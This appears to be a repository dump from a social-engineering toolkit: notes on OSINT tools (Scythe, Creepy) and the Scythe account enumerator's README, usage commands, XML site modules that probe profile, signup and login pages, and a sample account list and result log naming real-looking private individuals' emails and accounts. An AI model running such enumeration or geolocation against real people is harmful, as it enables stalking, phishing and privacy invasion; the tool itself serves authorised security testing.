You can search on a keyword or an IP address to find the services that are running. 47 | 48 | ## Scythe 49 | 50 | an interesting account enumerator tool that allows you to do account harvesting. You will use this tool to find out where your target has accounts on various Web sites. 51 | You install Scythe into your Kali instance from GitHub using the following steps: 52 | · Go to www.GitHub.com 53 | · Enter Scythe into the site’s search function 54 | · Choose ChrisJohnRiley/Scythe from the list that is returned 55 | 56 | ## Creepy 57 | 58 | The Web site www.geocreepy.com provides a useful tool that allows you to do geolocation for a target by using various social networking platforms to track individuals. Creepy works with Twitter, Flickr, Instagram, and Google Plus. 59 | 60 | ## Generate all possible Emails for a specific user 61 | 62 | [spread sheet](https://docs.google.com/spreadsheets/d/1iuEh3h3tekNaw5liAirkQlPZ5oaW_9MS37lsPpTV5Xk/edit#gid=0) 63 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/README.md: -------------------------------------------------------------------------------- 1 | Scythe 2 | ====== 3 | 4 | scythe: account enumerator 5 | 6 | Account Enumerator is designed to make it simple to perform account 7 | enumeration as part of security testing. The framework offers the ability 8 | to easily create new modules (XML files) and speed up the process of testing. 9 | 10 | This tool was created with 2 main use cases in mind: 11 | 12 | - The ability to test a range of email addresses across a range of sites (e.g. 13 | social media, blogging platforms, etc...) to find where those targets have 14 | active accounts. This can be useful in a social engineering test where you 15 | have email accounts for a company and want to list where these users have 16 | used their work email for 3rd party web based services. 
17 | 18 | - The ability to quickly create a custom testcase module and use it to enumerate 19 | for a list of active accounts. Using either a list of know usernames, email 20 | addresses, or a dictionary of common account names. 21 | 22 | This program is released as is and is not designed to be used to test again sites 23 | where you do not have permission. Any modules provided are for demonstration purposes 24 | and may breach end user license agreements if used against a site. Your mileage may 25 | vary... be responsible! 26 | 27 | External module depenancies: 28 | colorama (Windows only, optional) 29 | 30 | Example Usage: 31 | ============== 32 | 33 | > List available modules 34 | 35 | ./scythe.py -l 36 | 37 | > Check account list against facebook 38 | 39 | ./scythe.py --single facebook.com --accountfile=accountfile.txt 40 | 41 | > Check account list against facebook (using threads, w/ summary output) 42 | 43 | ./scythe.py --single facebook.com --accountfile=accountfile.txt --threads 4 --summary 44 | 45 | > Check account list against all modules in the social and blogs categories (w/ summary output) 46 | 47 | ./scythe.py --category=social,blogs --accountfile=accountfile.txt --summary 48 | 49 | > Check specific accounts against facebook 50 | 51 | ./scythe.py --single facebook.com --account=testuser,testuser2 52 | 53 | > Check account list against facebook (output to logfile) 54 | 55 | ./scythe.py --single facebook.com --accountfile=accountfile.txt --output=logfile.txt 56 | 57 | > Check accounts in the command line against Wordpress.com (3 retries, 60 second retry wait) 58 | 59 | ./scythe.py --single facebook.com --account=testuser,testuser1,testuser2 --retries=3 --retrytime=60 60 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/accountfile.txt: -------------------------------------------------------------------------------- 1 | odyssomay 2 | odyssomay@gmail.com 3 | reikaff@gmail.com 4 | 
midorisalt@gmail.com 5 | elinff@gmail.com 6 | jonathanff@gmail.com 7 | reikaff 8 | midorisalt 9 | jonathanfischerfriberg 10 | ElinFischerFriberg 11 | elinff 12 | jonathanff 13 | 14 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/license: -------------------------------------------------------------------------------- 1 | Copyright (C) 2012, Chris John Riley 2 | 3 | All rights reserved. 4 | 5 | Redistribution and use in source and binary forms, with or without 6 | modification, are permitted provided that the following conditions are 7 | met: 8 | 9 | (1) Redistributions of source code must retain the above copyright 10 | notice, this list of conditions and the following disclaimer. 11 | 12 | (2) Redistributions in binary form must reproduce the above copyright 13 | notice, this list of conditions and the following disclaimer in 14 | the documentation and/or other materials provided with the 15 | distribution. 16 | 17 | (3)The name of the author may not be used to 18 | endorse or promote products derived from this software without 19 | specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 22 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 23 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, 25 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 26 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 28 | HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 29 | STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING 30 | IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 31 | POSSIBILITY OF SUCH DAMAGE. 
32 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/logfile.txt: -------------------------------------------------------------------------------- 1 | Account odyssomay exists on cafemom.com (Username) 2 | Account odyssomay exists on GMail (username) 3 | Account odyssomay@gmail.com exists on cafemom.com (Username) 4 | Account reikaff@gmail.com exists on cafemom.com (Username) 5 | Account midorisalt@gmail.com exists on cafemom.com (Username) 6 | Account elinff@gmail.com exists on cafemom.com (Username) 7 | Account jonathanff@gmail.com exists on cafemom.com (Username) 8 | Account reikaff exists on cafemom.com (Username) 9 | Account reikaff exists on GMail (username) 10 | Account midorisalt exists on cafemom.com (Username) 11 | Account midorisalt exists on GMail (username) 12 | Account jonathanfischerfriberg exists on cafemom.com (Username) 13 | Account ElinFischerFriberg exists on cafemom.com (Username) 14 | Account elinff exists on cafemom.com (Username) 15 | Account elinff exists on colourlovers.com (Username) 16 | Account elinff exists on GMail (username) 17 | Account jonathanff exists on cafemom.com (Username) 18 | Account jonathanff exists on colourlovers.com (Username) 19 | Account jonathanff exists on twitpic.com (Username) 20 | Account jonathanff exists on Reddit.com (username) 21 | Account jonathanff exists on slideshare.net (Username) 22 | Account jonathanff exists on GMail (username) 23 | Account jonathanff exists on Yahoo (yahoo.co.uk email) 24 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/blogspot_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | blogspot.com (Username) 6 | .blogspot.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Powered by 13 | Blog not found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 
18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/delicious_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | delicious.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | The page you requested could not be found. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/goodreads_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | goodreads.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Recent Updates 13 | Page Not Found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/livejournal_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | livejournal.com (Username) 6 | .livejournal.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | most recent journal entries recorded 13 | Unknown Journal 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/mahalo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | mahalo.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Profile 13 | Sorry, we couldn't find the page you were looking for. 
14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/newsvine_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | newsvine.com (Username) 6 | .newsvine.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Member Since: 13 | Oh my. There doesn't seem to be a page here anymore. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/posterous_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | posterous.com (Username) 6 | .posterous.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | ARCHIVE 13 | Oh no! We couldn't find your page. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/resumebucket_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | resumebucket.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Forward This Resume 13 | The page you requested could not be found. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/squidoo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | squidoo.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | We're looking forward to something great happening soon 13 | Joined: 14 | I'm sorry, but we couldn't find that! 
15 | 10/12/2012 16 | 1 17 | Jaime Filson aka WiK 18 | blogs 19 | 20 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/tumblr.com_email.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | tumblr.com 5 | 6 | POST 7 | &user%5Bpassword%5D=&tumblelog%5Bname%5D=&action=signup_account]]> 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | False 10 | False 11 | email address is already in use 12 | 13 | 14/09/2012 14 | 1 15 | CJR 16 | blogs 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/tumblr.com_username.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | tumblr.com 5 | 6 | POST 7 | %40example.com&user%5Bpassword%5D=&tumblelog%5Bname%5D=&action=signup_account]]> 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | False 10 | False 11 | Another person has claimed this 12 | 13 | 14/09/2012 14 | 1 15 | CJR 16 | blogs 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/wordpress.com.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Wordpress.com 5 | 6 | POST 7 | &pwd=&testcookie=1&redirect_to=http%3A%2F%2Fwordpress.com%2F&submit=]]> 8 | 9 | False 10 | False 11 | The password you entered for the email or username 12 | Invalid email or username 13 | You have exceeded the login limit 14 | 13/09/2012 15 | 2 16 | CJR 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/commerce/ebay.com_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ebay.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: 
en-gb 10 | False 11 | False 12 | Feedback score: 13 | The User ID you entered was not found. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | commerce 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/commerce/etsy_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | etsy.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | Sorry, the user you are looking for does not exist. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | commerce 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/commerce/kaboodle_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | kaboodle.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Followers 13 | Sorry, the user does not exist. 
14 | 10/13/2012 15 | 1 16 | WiK 17 | commerce 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/development/github.com_email.xml: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | Github.com (Email) 9 | 10 | POST 11 | ]]> 12 | , Accept-Language: en-us, Content-Type: application/x-www-form-urlencoded; charset=UTF-8]]> 13 | true 14 | 15 | 16 | 17 | 18 | Email is invalid or already taken 19 | 20 | Due to the way github works, invalid email addresses may appear as false positives 21 | 16/09/2012 22 | 2 23 | CJR 24 | development 25 | 26 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/development/github.com_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Github.com (username) 5 | 6 | POST 7 | ]]> 8 | , Accept-Language: en-us, Content-Type: application/x-www-form-urlencoded; charset=UTF-8]]> 9 | true 10 | 11 | 12 | 13 | 14 | Username is already taken 15 | 16 | 15/09/2012 17 | 1 18 | CJR 19 | development 20 | 21 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/examples.xml: -------------------------------------------------------------------------------- 1 | 10 | 11 | 12 | 13 | Example Module GET 14 | ]]> 15 | GET 16 | 17 | Referer: http://www.example.com,Example: abcd 18 | 19 | 20 | 21 | ]]> 22 | 23 | password incorrect 24 | Invalid email or username 25 | 08/09/2012 26 | 1 27 | CJR 28 | example 29 | 30 | 31 | Example Module POST 32 | 33 | POST 34 | &pwd=&submit=]]> 35 | Referer: http://www.example.com,Example: abcd 36 | True 37 | 38 | password incorrect 39 | Invalid email or username 40 | 08/09/2012 41 | 1 42 | CJR 43 | example 44 | 45 | -------------------------------------------------------------------------------- 
/social_engineering/tools/scythe/modules/forums/backtrack_forum_username.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | BackTrack Forum 10 | 11 | POST 12 | &securitytoken=guest&do=verifyusername&username=]]> 13 | Accept-Language: en-gb 14 | false 15 | false 16 | That username is already 17 | Username is valid 18 | Account names cannot be in the format of an email address. Email addresses will cause false positives 19 | 08/09/2012 20 | 1 21 | Digininja 22 | forums 23 | 24 | 25 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/buzznet_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | buzznet.com (Username) 6 | .buzznet.com/user/]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Notes to 13 | the page you requested was not found. 14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/cafemom_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | cafemom.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | Personal Statement 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/colourlovers_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | colourlovers.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Last Seen 13 | [Invalid Lover] 14 | 10/13/2012 15 | 1 16 | WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- 
/social_engineering/tools/scythe/modules/forums/deviantart_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | deviantart.com (Username) 6 | .deviantart.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Newest Deviations 13 | The page you were looking for doesn't exist. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/epinions_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | epinions.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Epinions.com ID: 13 | Sorry, the page you requested was not found. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/families_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | families.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Recent Photos 13 | Page not found 14 | 10/13/2012 15 | 1 16 | WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/fanpop_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | fanpop.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Fanpopping since 13 | Search for anything you're a fanatic of 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/instructables_user.xml: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | instructables.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined: 13 | ERROR 400: no member: 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/wikipedia_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | wikipedia.org (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | This page was last modified 13 | is not registered 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/games/kongregate_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | kongregate.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | MEMBER SINCE 13 | Sorry, no account with that name was found. 
14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | games 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/games/xfire_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | xfire.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Game Library 13 | Try using the header to get back on track 14 | 05/19/2013 15 | 1 16 | anonymous 17 | games 18 | 19 | 20 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/dailymotion_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | dailymotion.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | create a jukebox 13 | HOUSTON, WE'VE GOT A PROBLEM... 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/flickr_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | flickr.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Subscribe to 13 | Oops! Looks like you followed a bad link. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/funnyordie_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | funnyordie.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | MEMBER 13 | We're sorry but we can't find that webpage. 
14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/hulu_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | hulu.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined On: 13 | The page you were lookin for doesn't exist (404 error) 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/justintv_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | justin.tv (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | 's channel 13 | Sorry, we couldn't find that stream. 14 | 10/13/2012 15 | 1 16 | WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/lastfm_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | last.fm (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Last seen: 13 | User not found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/photobucket_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | photobucket.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Feed for this album 13 | Page not found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- 
/social_engineering/tools/scythe/modules/media/soundcloud_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | soundcloud.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Sounds from 13 | Oops, looks like we can't find that page! 14 | 10/13/2012 15 | 1 16 | WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/twitpic_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | twitpic.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Photos and Videos by 13 | User could not be found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/ustream_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ustream.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined: 13 | An error occured 14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/vimeo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | vimeo.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | Page Not Found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/yfrog_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | yfrog.com (Username) 6 | 
/profile]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Timeline Search 13 | Something went wrong ... bad bad frog 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/youtube_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | youtube.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Featured 13 | the page you requested cannot be found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/zooomr_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | zooomr.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Subscribe to 13 | This Page was Not Found 14 | 10/13/2012 15 | 1 16 | WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/badoo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | badoo.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Personal info 13 | We can't seem to find this page 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/bitly_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | bitly.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | BITMARKS 13 | Uh oh, bitly couldn't find a link for the bitly URL you clicked. 
14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/cardcloud_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | cardcloud.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Download vCard 13 | We couldn't find the page you're looking for 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/disqus_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | disqus.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Activity 13 | Sorry, we couldn't find that page 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/facebook_email_phone.com.xml: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | facebook.com (Email/Phone) 9 | 10 | POST 11 | &pass=&default_persistent=1&login=Log+In]]> 12 | Accept-Language: en-gb 13 | true 14 | false 15 | The password you entered is incorrect 16 | not (belong to|associated with) 17 | Security Check 18 | Account names must be in email address or telephone number format. 
Permalinks will cause false positives 19 | 08/10/2012 20 | 4 21 | CJR 22 | social 23 | 24 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/flixster_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | flixster.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Add as Friend 13 | This profile is inaccessible, or the user has cancelled their account. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/foursquare_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | foursquare.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Check-ins 13 | We couldn't find the page you're looking for. 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/gather_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | gather.com (Username) 6 | .gather.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | You are not connected to 13 | The group or member URL you're trying to view does not exist. 
14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/linkedin_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | linkedin.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Overview 13 | Profile Not Found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/myspace_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | myspace.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | All Rights Reserved 13 | Your home page is undergoing routine maintenance 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/reddit.com_username.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Reddit.com (username) 6 | ]]> 7 | GET 8 | Accept-Language: en-gb 9 | false 10 | true 11 | 08/10/2012 12 | 1 13 | CJR 14 | social 15 | 16 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/slideshare_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | slideshare.net (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Followers 13 | is still available. 
